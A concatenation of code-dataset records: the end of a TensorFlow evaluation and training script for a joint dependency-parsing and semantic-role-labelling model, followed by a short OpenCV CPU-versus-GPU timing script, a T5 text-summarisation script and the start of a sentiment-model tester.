converted[-1] += ')'\n started_types.pop()\n while len(started_types) < len(Itypes) + len(Btypes):\n combined_str = '(' + Itypes[-1] + combined_str\n started_types.append(Itypes[-1])\n Itypes.pop()\n if not combined_str:\n combined_str = '*'\n elif combined_str[0] == \"(\" and combined_str[-1] != \")\":\n combined_str += '*'\n elif combined_str[-1] == \")\" and combined_str[0] != \"(\":\n combined_str = '*' + combined_str\n converted.append(combined_str)\n while len(started_types) > 0:\n converted[-1] += ')'\n started_types.pop()\n return converted\n\n def parens_check(self, srl_preds_str):\n for srl_preds in srl_preds_str:\n parens_count = 0\n for pred in srl_preds:\n for c in pred:\n if c == '(':\n parens_count += 1\n if c == ')':\n parens_count -= 1\n if parens_count < 0:\n return False\n if parens_count != 0:\n return False\n return True\n\n def merge_preds(self, all_preds, dataset):\n # want a sentences x tokens x fields array\n preds_merged = []\n current_sentid = -1\n current_sent_shared = None\n current_srls = []\n current_predicates = None\n merged_indices = []\n examples = 0\n sentences = 0\n predicate_idx = 4\n\n # for each example\n for bkt_idx, idx in dataset._metabucket.data:\n examples += 1\n preds = all_preds[bkt_idx][idx]\n this_sent_id = preds[0, 6]\n # if this_sent_id < 4:\n # print(\"orig preds\", preds)\n # print(\"preds\", preds)\n if this_sent_id != current_sentid:\n sentences += 1\n current_sentid = this_sent_id\n # print(\"processing sent %d\" % current_sentid)\n merged_indices.append((bkt_idx, idx))\n if current_sent_shared is not None:\n # print(\"last sent had: %d/%d preds\" % (len(current_srls), np.sum(current_predicates)))\n # merge and add to merged list\n # print(merged_srls)\n # if len(merged_srls.shape) == 1:\n # merged_srls = np.expand_dims(merged_srls, -1)\n # print(\"merged srls\", len(merged_srls.shape), merged_srls.shape, merged_srls)\n # print(\"current shared\", current_sent_shared.shape, current_sent_shared)\n current_sent_shared[:, predicate_idx] = current_predicates\n if current_srls:\n merged_srls = np.concatenate(current_srls, axis=-1)\n merged_sent = np.concatenate([current_sent_shared, merged_srls], axis=1)\n else:\n merged_sent = current_sent_shared\n preds_merged.append(merged_sent)\n current_sent_shared = preds[:, :17]\n current_srls = []\n current_predicates = np.zeros(current_sent_shared.shape[0])\n if preds.shape[1] > 16:\n # print(current_sent_shared)\n current_srls.append(np.expand_dims(preds[:, -1], -1))\n current_predicates += (preds[:, predicate_idx] > self._vocabs[4].predicate_true_start_idx).astype(np.int32)\n # print(\"predicates\", (preds[:, predicate_idx] > self._vocabs[4].predicate_true_start_idx).astype(np.int32))\n\n # deal with last one\n current_sent_shared[:, predicate_idx] = current_predicates\n if current_srls:\n merged_srls = np.concatenate(current_srls, axis=-1)\n merged_sent = np.concatenate([current_sent_shared, merged_srls], axis=1)\n else:\n merged_sent = current_sent_shared\n preds_merged.append(merged_sent)\n\n print(\"Merged %d examples into %d/%d sentences\" % (examples, len(preds_merged), sentences))\n return preds_merged, merged_indices\n\n \n #=============================================================\n # TODO make this work if lines_per_buff isn't set to 0\n def test(self, sess, viterbi=False, validate=False):\n \"\"\"\"\"\"\n \n if validate:\n filename = self.valid_file\n minibatches = self.valid_minibatches\n dataset = self._validset\n op = self.ops['test_op'][:15]\n else:\n filename = self.test_file\n minibatches = self.test_minibatches\n dataset = self._testset\n op = self.ops['test_op'][15:]\n \n all_predictions = [[]]\n all_sents = [[]]\n bkt_idx = 0\n total_time = 0.\n roots_lt_total = 0.\n roots_gt_total = 0.\n cycles_2_total = 0.\n cycles_n_total = 0.\n not_tree_total = 0.\n srl_correct_total = 0.\n srl_count_total = 0.\n forward_total_time = 0.\n non_tree_preds_total = []\n attention_weights = {}\n attn_correct_counts = {}\n pos_correct_total = 0.\n n_tokens = 0.\n for batch_num, (feed_dict, sents) in enumerate(minibatches()):\n mb_inputs = feed_dict[dataset.inputs]\n mb_targets = feed_dict[dataset.targets]\n forward_start = time.time()\n probs, n_cycles, len_2_cycles, srl_probs, srl_preds, srl_logits, srl_correct, srl_count, srl_predicates, srl_predicate_targets, transition_params, attn_weights, attn_correct, pos_correct, pos_preds = sess.run(op, feed_dict=feed_dict)\n forward_total_time += time.time() - forward_start\n preds, parse_time, roots_lt, roots_gt, cycles_2, cycles_n, non_trees, non_tree_preds, n_tokens_batch = self.model.validate(mb_inputs, mb_targets, probs, n_cycles, len_2_cycles, srl_preds, srl_logits, srl_predicates, srl_predicate_targets, pos_preds, transition_params if viterbi else None)\n n_tokens += n_tokens_batch\n for k, v in attn_weights.iteritems():\n attention_weights[\"b%d:layer%d\" % (batch_num, k)] = v\n for k, v in attn_correct.iteritems():\n if k not in attn_correct_counts:\n attn_correct_counts[k] = 0.\n attn_correct_counts[k] += v\n total_time += parse_time\n roots_lt_total += roots_lt\n roots_gt_total += roots_gt\n cycles_2_total += cycles_2\n cycles_n_total += cycles_n\n not_tree_total += non_trees\n srl_correct_total += srl_correct\n srl_count_total += srl_count\n pos_correct_total += pos_correct\n non_tree_preds_total.extend(non_tree_preds)\n all_predictions[-1].extend(preds)\n all_sents[-1].extend(sents)\n if len(all_predictions[-1]) == len(dataset[bkt_idx]):\n bkt_idx += 1\n if bkt_idx < len(dataset._metabucket):\n all_predictions.append([])\n all_sents.append([])\n\n if self.one_example_per_predicate:\n all_predictions, data_indices = self.merge_preds(all_predictions, dataset)\n else:\n data_indices = dataset._metabucket.data\n # all_predictions = [p for s in all_predictions for p in s]\n\n correct = {'UAS': 0., 'LAS': 0., 'parse_eval': '', 'F1': 0.}\n srl_acc = 0.0\n if self.eval_parse:\n print(\"Total time in prob_argmax: %f\" % total_time)\n print(\"Total time in forward: %f\" % forward_total_time)\n print(\"Not tree: %d\" % not_tree_total)\n print(\"Roots < 1: %d; Roots > 1: %d; 2-cycles: %d; n-cycles: %d\" % (roots_lt_total, roots_gt_total, cycles_2_total, cycles_n_total))\n # ID: Word index, integer starting at 1 for each new sentence; may be a range for multiword tokens; may be a decimal number for empty nodes.\n # FORM: Word form or punctuation symbol.\n # LEMMA: Lemma or stem of word form.\n # UPOSTAG: Universal part-of-speech tag.\n # XPOSTAG: Language-specific part-of-speech tag; underscore if not available.\n # FEATS: List of morphological features from the universal feature inventory or from a defined language-specific extension; underscore if not available.\n # HEAD: Head of the current word, which is either a value of ID or zero (0).\n # DEPREL: Universal dependency relation to the HEAD (root iff HEAD = 0) or a defined language-specific subtype of one.\n # DEPS: Enhanced dependency graph in the form of a list of head-deprel pairs.\n # MISC: Any other annotation.\n\n parse_gold_fname = self.gold_dev_parse_file if validate else self.gold_test_parse_file\n\n # write predicted parse\n parse_pred_fname = os.path.join(self.save_dir, \"parse_preds.tsv\")\n with open(parse_pred_fname, 'w') as f:\n for p_idx, (bkt_idx, idx) in enumerate(data_indices):\n preds = all_predictions[p_idx] if self.one_example_per_predicate else all_predictions[bkt_idx][idx]\n words = all_sents[bkt_idx][idx]\n # sent[:, 6] = targets[tokens, 0] # 5 targets[0] = gold_tag\n # sent[:, 7] = parse_preds[tokens] # 6 = pred parse head\n # sent[:, 8] = rel_preds[tokens] # 7 = pred parse label\n # sent[:, 9] = targets[tokens, 1] # 8 = gold parse head\n # sent[:, 10] = targets[tokens, 2] # 9 = gold parse label\n sent_len = len(words)\n if self.eval_single_token_sents or sent_len > 1:\n for i, (word, pred) in enumerate(zip(words, preds)):\n head = pred[8] + 1\n tok_id = i + 1\n # assert self.tags[datum[6]] == self.tags[pred[7]]\n tup = (\n tok_id, # id\n word, # form\n self.tags[pred[7]], # gold tag\n # self.tags[pred[11]] if self.joint_pos_predicates or self.train_pos else self.tags[pred[4]], # pred tag or auto tag\n str(head if head != tok_id else 0), # pred head\n self.rels[pred[9]] # pred label\n )\n f.write('%s\\t%s\\t_\\t%s\\t_\\t_\\t%s\\t%s\\n' % tup)\n f.write('\\n')\n\n with open(os.devnull, 'w') as devnull:\n try:\n parse_eval = check_output([\"perl\", \"bin/eval.pl\", \"-g\", parse_gold_fname, \"-s\", parse_pred_fname], stderr=devnull)\n short_str = parse_eval.split('\\n')[:3]\n print('\\n'.join(short_str))\n print('\\n')\n correct['parse_eval'] = parse_eval\n correct['LAS'] = short_str[0].split()[9]\n correct['UAS'] = short_str[1].split()[9]\n except CalledProcessError as e:\n print(\"Call to parse eval failed: %s\" % e.output)\n\n if self.eval_by_domain:\n parse_gold_fname_path = '/'.join(parse_gold_fname.split('/')[:-1])\n parse_gold_fname_end = parse_gold_fname.split('/')[-1]\n for d in self._vocabs[5].keys():\n if d not in self._vocabs[5].SPECIAL_TOKENS:\n domain_gold_fname = os.path.join(parse_gold_fname_path, d + '_' + parse_gold_fname_end)\n domain_fname = os.path.join(self.save_dir, '%s_parse_preds.tsv' % d)\n with open(domain_fname, 'w') as f:\n for p_idx, (bkt_idx, idx) in enumerate(data_indices):\n preds = all_predictions[p_idx] if self.one_example_per_predicate else all_predictions[bkt_idx][idx]\n words = all_sents[bkt_idx][idx]\n domain = '-'\n sent_len = len(words)\n if self.eval_single_token_sents or sent_len > 1:\n for i, (word, pred) in enumerate(zip(words, preds)):\n domain = self._vocabs[5][pred[5]]\n head = pred[8] + 1\n tok_id = i + 1\n if domain == d:\n tup = (\n tok_id, # id\n word, # form\n self.tags[pred[7]], # gold tag\n # self.tags[pred[11]] if self.joint_pos_predicates or self.train_pos else self.tags[pred[4]], # pred tag or auto tag\n str(head if head != tok_id else 0), # pred head\n self.rels[pred[9]] # pred label\n )\n f.write('%s\\t%s\\t_\\t%s\\t_\\t_\\t%s\\t%s\\n' % tup)\n if domain == d:\n f.write('\\n')\n with open(os.devnull, 'w') as devnull:\n try:\n parse_eval_d = check_output([\"perl\", \"bin/eval.pl\", \"-g\", domain_gold_fname, \"-s\", domain_fname],\n stderr=devnull)\n short_str_d = map(lambda s: \"%s %s\" % (d, s), parse_eval_d.split('\\n')[:3])\n print('\\n'.join(short_str_d))\n print('\\n')\n # correct['parse_eval'] = parse_eval\n # correct['LAS'] = short_str[0].split()[9]\n # correct['UAS'] = short_str[1].split()[9]\n except CalledProcessError as e:\n print(\"Call to eval failed: %s\" % e.output)\n\n if self.eval_srl:\n # load the real gold preds file\n srl_gold_fname = self.gold_dev_props_file if validate else self.gold_test_props_file\n\n # save SRL gold output for debugging purposes\n srl_sanity_fname = os.path.join(self.save_dir, 'srl_sanity.tsv')\n with open(srl_sanity_fname, 'w') as f, open(filename, 'r') as orig_f:\n for p_idx, (bkt_idx, idx) in enumerate(data_indices):\n # for each word, if predicate print word, otherwise -\n # then all the SRL labels\n data = dataset._metabucket[bkt_idx].data[idx]\n preds = all_predictions[p_idx] if self.one_example_per_predicate else all_predictions[bkt_idx][idx]\n # if len(preds.shape) < 2:\n # preds = np.reshape(preds, [1, preds.shape[0]])\n words = all_sents[bkt_idx][idx]\n num_gold_srls = preds[0, 13]\n num_pred_srls = preds[0, 14]\n srl_preds = preds[:, 15+num_pred_srls+num_gold_srls:]\n srl_golds = preds[:, 15+num_pred_srls:15+num_gold_srls+num_pred_srls]\n srl_preds_bio = map(lambda p: self._vocabs[3][p], srl_preds)\n srl_preds_str = map(list, zip(*[self.convert_bilou(j) for j in np.transpose(srl_preds)]))\n # todo if you want golds in here get it from the props file\n # srl_golds_str = map(list, zip(*[self.convert_bilou(j) for j in np.transpose(srl_golds)]))\n # print(srl_golds_str)\n # print(srl_preds_str)\n for i, (datum, word, pred) in enumerate(zip(data, words, preds)):\n orig_line = orig_f.readline().strip()\n while not orig_line:\n orig_line = orig_f.readline().strip()\n orig_split_line = orig_line.split('\\t')\n docid = orig_split_line[0]\n sentid = orig_split_line[1]\n domain = self._vocabs[5][pred[5]]\n orig_pred = srl_preds_str[i] if srl_preds_str else []\n # gold_pred = srl_golds_str[i] if srl_golds_str else []\n bio_pred = srl_preds_bio[i] if srl_preds_bio else []\n word_str = word\n tag0_str = self.tags[pred[7]] # gold tag\n tag1_str = self.tags[pred[3]] # auto tag\n tag2_str = self.tags[pred[12]] # predicted tag\n # gold_pred = word if np.any([\"(V*\" in p for p in gold_pred]) else '-'\n pred_pred = word if np.any([\"(V*\" in p for p in orig_pred]) else '-'\n # fields = (domain,) + (word_str,) + (tag0_str,) + (tag1_str,) + (tag2_str,) + (gold_pred,) + (pred_pred,) + tuple(bio_pred) + tuple(orig_pred)\n fields = (docid,) + (sentid,) + (word_str,) + (tag0_str,) + (tag1_str,) + (tag2_str,) + (pred_pred,) + tuple(bio_pred) + tuple(orig_pred)\n owpl_str = '\\t'.join(fields)\n f.write(owpl_str + \"\\n\")\n f.write('\\n')\n\n # save SRL output\n srl_preds_fname = os.path.join(self.save_dir, 'srl_preds.tsv')\n # print(\"writing srl preds file: %s\" % srl_preds_fname)\n with open(srl_preds_fname, 'w') as f:\n for p_idx, (bkt_idx, idx) in enumerate(data_indices):\n # for each word, if predicate print word, otherwise -\n # then all the SRL labels\n preds = all_predictions[p_idx] if self.one_example_per_predicate else all_predictions[bkt_idx][idx]\n words = all_sents[bkt_idx][idx]\n # if len(preds.shape) < 2:\n # preds = np.reshape(preds, [1, preds.shape[0]])\n # print(\"preds\", preds)\n num_gold_srls = preds[0, 13]\n num_pred_srls = preds[0, 14]\n srl_preds = preds[:, 15 + num_gold_srls + num_pred_srls:]\n if self.one_example_per_predicate:\n # srl_preds = preds[:, 14 + num_gold_srls + num_pred_srls:]\n predicate_indices = np.where(preds[:, 4] == 1)[0]\n # print(\"predicate indices\", predicate_indices)\n else:\n predicate_indices = preds[0, 15:15+num_pred_srls]\n # print(\"predicate indices\", predicate_indices)\n srl_preds_str = map(list, zip(*[self.convert_bilou(j) for j in np.transpose(srl_preds)]))\n # if len(predicate_indices) == 0:\n # if preds[0,6] < 4:\n # print(\"preds\", preds)\n # print(\"predicate inds\", predicate_indices)\n # print(\"srl_preds_str\", srl_preds_str)\n # print(\"srl_preds\", srl_preds)\n # print(\"words\", words)\n for i, word in enumerate(words):\n pred = srl_preds_str[i] if srl_preds_str else []\n word_str = word if i in predicate_indices else '-'\n fields = (word_str,) + tuple(pred)\n owpl_str = '\\t'.join(fields)\n f.write(owpl_str + \"\\n\")\n if not self.parens_check(np.transpose(srl_preds_str)):\n print(np.transpose(srl_preds_str))\n print(map(lambda i: self._vocabs[3][i], np.transpose(srl_preds)))\n f.write('\\n')\n\n srl_acc = (srl_correct_total / srl_count_total)*100.0\n\n with open(os.devnull, 'w') as devnull:\n try:\n srl_eval = check_output([\"perl\", \"bin/srl-eval.pl\", srl_gold_fname, srl_preds_fname], stderr=devnull)\n print(srl_eval)\n overall_f1 = float(srl_eval.split('\\n')[6].split()[-1])\n correct['F1'] = overall_f1\n except CalledProcessError as e:\n print(\"Call to eval failed: %s\" % e.output)\n\n if self.eval_by_domain:\n srl_gold_fname_path = '/'.join(srl_gold_fname.split('/')[:-1])\n srl_gold_fname_end = srl_gold_fname.split('/')[-1]\n for d in self._vocabs[5].keys():\n if d not in self._vocabs[5].SPECIAL_TOKENS:\n domain_gold_fname = os.path.join(srl_gold_fname_path, d + '_' + srl_gold_fname_end)\n domain_fname = os.path.join(self.save_dir, '%s_srl_preds.tsv' % d)\n with open(domain_fname, 'w') as f:\n for p_idx, (bkt_idx, idx) in enumerate(data_indices):\n # for each word, if predicate print word, otherwise -\n # then all the SRL labels\n # data = dataset._metabucket[bkt_idx].data[idx]\n preds = all_predictions[p_idx] if self.one_example_per_predicate else all_predictions[bkt_idx][idx]\n words = all_sents[bkt_idx][idx]\n num_gold_srls = preds[0, 13]\n num_pred_srls = preds[0, 14]\n srl_preds = preds[:, 15 + num_gold_srls + num_pred_srls:]\n predicate_indices = preds[:, 15:15 + num_pred_srls]\n srl_preds_str = map(list, zip(*[self.convert_bilou(j) for j in np.transpose(srl_preds)]))\n domain = '-'\n for i, (word, p) in enumerate(zip(words, preds)):\n domain = self._vocabs[5][p[5]]\n if domain == d:\n pred = srl_preds_str[i] if srl_preds_str else []\n word_str = word if i in predicate_indices else '-'\n fields = (word_str,) + tuple(pred)\n owpl_str = '\\t'.join(fields)\n f.write(owpl_str + \"\\n\")\n if not self.parens_check(np.transpose(srl_preds_str)):\n print(np.transpose(srl_preds_str))\n print(map(lambda i: self._vocabs[3][i], np.transpose(srl_preds)))\n if domain == d:\n f.write('\\n')\n with open(os.devnull, 'w') as devnull:\n try:\n srl_eval_d = check_output([\"perl\", \"bin/srl-eval.pl\", domain_gold_fname, domain_fname], stderr=devnull)\n # print(srl_eval)\n str_d = srl_eval_d.split('\\n')[6]\n except CalledProcessError as e:\n print(\"Call to eval failed: %s\" % e.output)\n str_d = \"\"\n print(\"%sSRL %s:\" % (\"viterbi \" if viterbi else \"\", d))\n print(str_d)\n\n # with open(os.path.join(self.save_dir, 'scores.txt'), 'a') as f:\n # s, correct = self.model.evaluate(os.path.join(self.save_dir, os.path.basename(filename)), punct=self.model.PUNCT)\n # f.write(s)\n\n if validate and self.multitask_layers != \"\":\n print(\"Attention UAS: \")\n multitask_uas_str = ''\n for k in sorted(attn_correct_counts):\n # todo w/ w/o mask punct\n attn_correct_counts[k] = attn_correct_counts[k] / n_tokens\n multitask_uas_str += '\\t%s UAS: %.2f' % (k, attn_correct_counts[k] * 100)\n print(multitask_uas_str)\n\n if self.save_attn_weights:\n attention_weights = {str(k): v for k, v in attention_weights.iteritems()}\n np.savez(os.path.join(self.save_dir, 'attention_weights'), **attention_weights)\n\n pos_accuracy = (pos_correct_total/n_tokens)*100.0\n correct['POS'] = pos_accuracy\n # if validate:\n # np.savez(os.path.join(self.save_dir, 'non_tree_preds.txt'), non_tree_preds_total)\n # print(non_tree_preds_total)\n # print(non_tree_preds_total, file=f)\n # las = np.mean(correct[\"LAS\"]) * 100\n # uas = np.mean(correct[\"UAS\"]) * 100\n print('UAS: %s LAS: %s' % (correct[\"UAS\"], correct[\"LAS\"]))\n print('POS: %.2f' % pos_accuracy)\n print('SRL acc: %.2f' % (srl_acc))\n print('%sSRL F1: %s' % (\"viterbi \" if viterbi else \"\", correct[\"F1\"]))\n return correct\n \n #=============================================================\n def savefigs(self, sess, optimizer=False):\n \"\"\"\"\"\"\n \n import gc\n import matplotlib as mpl\n mpl.use('Agg')\n import matplotlib.pyplot as plt\n matdir = os.path.join(self.save_dir, 'matrices')\n if not os.path.isdir(matdir):\n os.mkdir(matdir)\n for var in self.save_vars:\n if optimizer or ('Optimizer' not in var.name):\n print(var.name)\n mat = sess.run(var)\n if len(mat.shape) == 1:\n mat = mat[None,:]\n plt.figure()\n try:\n plt.pcolor(mat, cmap='RdBu')\n plt.gca().invert_yaxis()\n plt.colorbar()\n plt.clim(vmin=-1, vmax=1)\n plt.title(var.name)\n plt.savefig(os.path.join(matdir, var.name.replace('/', '-')))\n except ValueError:\n pass\n plt.close()\n del mat\n gc.collect()\n \n #=============================================================\n def _gen_ops(self):\n \"\"\"\"\"\"\n \n optimizer = optimizers.RadamOptimizer(self._config, global_step=self._global_step)\n train_output = self._model(self._trainset)\n\n lr = optimizer.learning_rate\n\n train_op = optimizer.minimize(train_output['loss'])\n\n # These have to happen after optimizer.minimize is called\n valid_output = self._model(self._validset, moving_params=optimizer)\n test_output = self._model(self._testset, moving_params=optimizer)\n\n\n \n ops = {}\n ops['train_op'] = [train_op] + [train_output['loss'],\n train_output['n_correct'],\n train_output['n_tokens']]\n ops['train_op_svd'] = [train_op] + [train_output['loss'],\n train_output['n_correct'],\n train_output['n_tokens'],\n train_output['roots_loss'],\n train_output['2cycle_loss'],\n train_output['svd_loss'],\n train_output['log_loss'],\n train_output['rel_loss']]\n ops['train_op_srl'] = [train_op] + [train_output['loss'],\n train_output['n_correct'],\n train_output['n_tokens'],\n train_output['roots_loss'],\n train_output['2cycle_loss'],\n train_output['svd_loss'],\n train_output['log_loss'],\n train_output['rel_loss'],\n train_output['srl_loss'],\n train_output['srl_correct'],\n train_output['srl_count'],\n train_output['predicate_loss'],\n train_output['predicate_count'],\n train_output['predicate_correct'],\n train_output['pos_loss'],\n train_output['pos_correct'],\n train_output['multitask_losses'],\n lr,\n train_output['sample_prob']]\n ops['valid_op'] = [valid_output['loss'],\n valid_output['n_correct'],\n valid_output['n_tokens'],\n valid_output['predictions']]\n ops['test_op'] = [valid_output['probabilities'],\n valid_output['n_cycles'],\n valid_output['len_2_cycles'],\n valid_output['srl_probs'],\n valid_output['srl_preds'],\n valid_output['srl_logits'],\n valid_output['srl_correct'],\n valid_output['srl_count'],\n valid_output['srl_predicates'],\n valid_output['srl_predicate_targets'],\n valid_output['transition_params'],\n valid_output['attn_weights'],\n valid_output['attn_correct'],\n valid_output['pos_correct'],\n valid_output['pos_preds'],\n test_output['probabilities'],\n test_output['n_cycles'],\n test_output['len_2_cycles'],\n test_output['srl_probs'],\n test_output['srl_preds'],\n test_output['srl_logits'],\n test_output['srl_correct'],\n test_output['srl_count'],\n test_output['srl_predicates'],\n test_output['srl_predicate_targets'],\n test_output['transition_params'],\n test_output['attn_weights'],\n test_output['attn_correct'],\n test_output['pos_correct'],\n test_output['pos_preds'],\n ]\n # ops['optimizer'] = optimizer\n \n return ops\n \n #=============================================================\n # @property\n # def global_step(self):\n # return self._global_step\n @property\n def global_epoch(self):\n return self._global_epoch\n @property\n def model(self):\n return self._model\n @property\n def words(self):\n return self._vocabs[0]\n @property\n def tags(self):\n return self._vocabs[1]\n @property\n def rels(self):\n return self._vocabs[2]\n @property\n def ops(self):\n return self._ops\n @property\n def save_vars(self):\n return self._save_vars\n \n#***************************************************************\nif __name__ == '__main__':\n \"\"\"\"\"\"\n \n import argparse\n \n argparser = argparse.ArgumentParser()\n argparser.add_argument('--test', action='store_true')\n argparser.add_argument('--load', action='store_true')\n argparser.add_argument('--model', default='Parser')\n argparser.add_argument('--matrix', action='store_true')\n argparser.add_argument('--profile', action='store_true')\n argparser.add_argument('--test_eval', action='store_true')\n \n args, extra_args = argparser.parse_known_args()\n cargs = {k: v for (k, v) in vars(Configurable.argparser.parse_args(extra_args)).iteritems() if v is not None}\n \n print('*** '+args.model+' ***')\n model = getattr(models, args.model)\n\n profile = args.profile\n \n # if 'save_dir' in cargs and os.path.isdir(cargs['save_dir']) and not (args.test or args.matrix or args.load):\n # raw_input('Save directory already exists. Press to overwrite or to exit.')\n # if (args.test or args.load or args.matrix) and 'save_dir' in cargs:\n # cargs['config_file'] = os.path.join(cargs['save_dir'], 'config.cfg')\n network = Network(model, **cargs)\n os.system('echo Model: %s > %s/MODEL' % (network.model.__class__.__name__, network.save_dir))\n\n # print variable names (but not the optimizer ones)\n print([v.name for v in network.save_vars if 'Optimizer' not in v.name and 'layer_norm' not in v.name])\n\n config_proto = tf.ConfigProto()\n config_proto.gpu_options.per_process_gpu_memory_fraction = network.per_process_gpu_memory_fraction\n\n # Create options to profile the time and memory information.\n if profile:\n builder = tf.profiler.ProfileOptionBuilder\n opts = builder(builder.time_and_memory()).order_by('micros').build()\n # Create a profiling context, set constructor argument `trace_steps`,\n # `dump_steps` to empty for explicit control.\n with tf.contrib.tfprof.ProfileContext('/tmp/train_dir',\n trace_steps=[],\n dump_steps=[]) if profile else dummy_context_mgr() as pctx:\n with tf.Session(config=config_proto) as sess:\n sess.run(tf.global_variables_initializer())\n if not (args.test or args.matrix):\n if args.load:\n os.system('echo Training: > %s/HEAD' % network.save_dir)\n os.system('git rev-parse HEAD >> %s/HEAD' % network.save_dir)\n saver = tf.train.Saver(var_list=network.save_vars, save_relative_paths=True)\n saver.restore(sess, tf.train.latest_checkpoint(network.load_dir, latest_filename=network.name.lower()))\n if os.path.isfile(os.path.join(network.save_dir, 'history.pkl')):\n with open(os.path.join(network.save_dir, 'history.pkl')) as f:\n network.history = pkl.load(f)\n else:\n os.system('echo Loading: >> %s/HEAD' % network.load_dir)\n os.system('git rev-parse HEAD >> %s/HEAD' % network.save_dir)\n network.train(sess, profile)\n elif args.matrix:\n saver = tf.train.Saver(var_list=network.save_vars, save_relative_paths=True)\n saver.restore(sess, tf.train.latest_checkpoint(network.save_dir, latest_filename=network.name.lower()))\n # TODO make this save pcolor plots of all matrices to a directory in save_dir\n #with tf.variable_scope('RNN0/BiRNN_FW/LSTMCell/Linear', reuse=True):\n # pkl.dump(sess.run(tf.get_variable('Weights')), open('mat0.pkl', 'w'))\n #with tf.variable_scope('RNN1/BiRNN_FW/LSTMCell/Linear', reuse=True):\n # pkl.dump(sess.run(tf.get_variable('Weights')), open('mat1.pkl', 'w'))\n #with tf.variable_scope('RNN2/BiRNN_FW/LSTMCell/Linear', reuse=True):\n # pkl.dump(sess.run(tf.get_variable('Weights')), open('mat2.pkl', 'w'))\n #with tf.variable_scope('MLP/Linear', reuse=True):\n # pkl.dump(sess.run(tf.get_variable('Weights')), open('mat3.pkl', 'w'))\n network.savefigs(sess)\n else:\n os.system('echo Testing: >> %s/HEAD' % network.save_dir)\n os.system('git rev-parse HEAD >> %s/HEAD' % network.save_dir)\n saver = tf.train.Saver(var_list=network.save_vars, save_relative_paths=True)\n print(\"Loading model: \", network.load_dir)\n print(network.name.lower())\n saver.restore(sess, tf.train.latest_checkpoint(network.load_dir, latest_filename=network.name.lower()))\n\n # decode with & without viterbi\n network.test(sess, False, validate=True)\n if network.eval_srl and (network.viterbi_decode or network.viterbi_train):\n network.test(sess, True, validate=True)\n\n # Actually evaluate on test data\n if args.test_eval:\n start_time = time.time()\n network.test(sess, network.viterbi_decode or network.viterbi_train, validate=False)\n print('Parsing took %f seconds' % (time.time() - start_time))\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":46864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"408524257","text":"\"\"\"\r\ncpu_gpu.py\r\nAn OpenCL-OpenCV-Python CPU vs GPU comparison\r\n\"\"\"\r\nimport cv2\r\nimport timeit\r\n\r\n# A simple image pipeline that runs on both Mat and Umat\r\ndef img_cal(img, mode):\r\n if mode=='UMat':\r\n img = cv2.UMat(img)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n img = cv2.GaussianBlur(img, (7, 7), 1.5)\r\n img = cv2.Canny(img, 0, 50)\r\n if type(img) == 'cv2.UMat': \r\n img = cv2.UMat.get(img)\r\n\r\n return img\r\n\r\n# Timing function\r\ndef run(processor, function, n_threads, N):\r\n cv2.setNumThreads(n_threads)\r\n t = timeit.timeit(function, globals=globals(), number=N)/N*1000\r\n print('%s avg. with %d threads: %0.2f ms' % (processor, n, t))\r\n return t\r\n\r\nimg = cv2.imread('test.jpg') \r\nN = 1000\r\nthreads = [1, 16]\r\n\r\nprocessor = {'GPU': \"img_cal(img, 'UMat')\", \r\n 'CPU': \"img_cal(img, '')\"}\r\nresults = {}\r\nfor n in range(8): \r\n for pro in processor.keys():\r\n results[pro,n] = run(processor=pro, \r\n function= processor[pro], \r\n n_threads=n, N=N)\r\n\r\nprint('\\nGPU speed increase over 1 CPU thread [%%]: %0.2f' % \\\r\n (results[('CPU', 1)]/results[('GPU', 1)]*100))\r\nprint('CPU speed increase on 4 threads versus 1 thread [%%]: %0.2f' % \\\r\n (results[('CPU', 1)]/results[('CPU', 16)]*100))\r\nprint('GPU speed increase versus 4 threads [%%]: %0.2f' % \\\r\n (results[('CPU', 4)]/results[('CPU', 1)]*100))","sub_path":"opencv_cuda_test.py","file_name":"opencv_cuda_test.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"315872546","text":"import sys\nimport torch\nfrom transformers import T5ForConditionalGeneration,T5Tokenizer\n\nsummary_model = T5ForConditionalGeneration.from_pretrained('t5-base')\nsummary_tokenizer = T5Tokenizer.from_pretrained('t5-base')\n\ncontent = sys.argv[1]\n\ndef get_summary(text):\n preprocess_text = text.strip().replace(\"\\n\", \"\")\n\n tokenized_text = summary_tokenizer.encode(preprocess_text, add_special_tokens=False, return_tensors=\"pt\")\n\n while len(tokenized_text[0]) > 509:\n tokenized_chunk, tokenized_text = tokenized_text[0][:509], tokenized_text[0][509:]\n\n tokenized_chunk = torch.stack(\n [torch.cat([torch.Tensor([21603]), torch.Tensor([10]), tokenized_chunk, torch.Tensor([1])\n ]).long()])\n\n summary_id = summary_model.generate(tokenized_chunk,\n num_beams=5,\n no_repeat_ngram_size=2,\n min_length=100,\n max_length=512)\n\n tokenized_text = torch.stack([torch.cat([summary_id[0], tokenized_text])])\n\n output = summary_tokenizer.decode(tokenized_text[0], skip_special_tokens=True)\n\n return output\n\n\nsummary = get_summary(content)\n\nprint(summary)","sub_path":"pysummary.py","file_name":"pysummary.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"622054581","text":"import tensorflow as tf\nfrom src.base.base_test import BaseTest\nfrom tqdm import tqdm\nimport numpy as np\n\n\nclass SentimentTester(BaseTest):\n def __init__(self, sess, model, data, config, logger):\n super().__init__(sess, model, data, config, logger)\n\n def test(self):\n loop = tqdm(range(self.data.num_batches_test))\n losses = []\n accs = []\n for _ in loop:\n loss, acc = self.test_step()\n losses.append(loss)\n accs.append(acc)\n loss = np.mean(losses)\n acc = np.mean(accs)\n print(\"test_accuracy: \",\n acc * 100, \"% test_loss: \", loss)\n\n def predict(self):\n predictions = np.empty(shape=[0], dtype=int)\n loop = tqdm(range(self.data.num_batches_test))\n for _ in loop:\n prediction = self.predict_step()\n predictions = np.concatenate((predictions, prediction))\n\n return predictions\n\n def predict_step(self):\n batch_x = self.data.next_batch(batch_type=\"unlabeled_test\")\n feed_dict = {self.model.x: batch_x, self.model.is_training: False,\n self.model.seq_len: batch_x.shape[1],\n self.model.keep_prob_lstm_out: 1.0,\n self.model.keep_prob_lstm_recurrent: 1.0, self.model.keep_prob_fc: 1.0}\n\n prediction = self.sess.run([self.model.predictions],\n feed_dict=feed_dict)\n\n return prediction[0]\n\n def 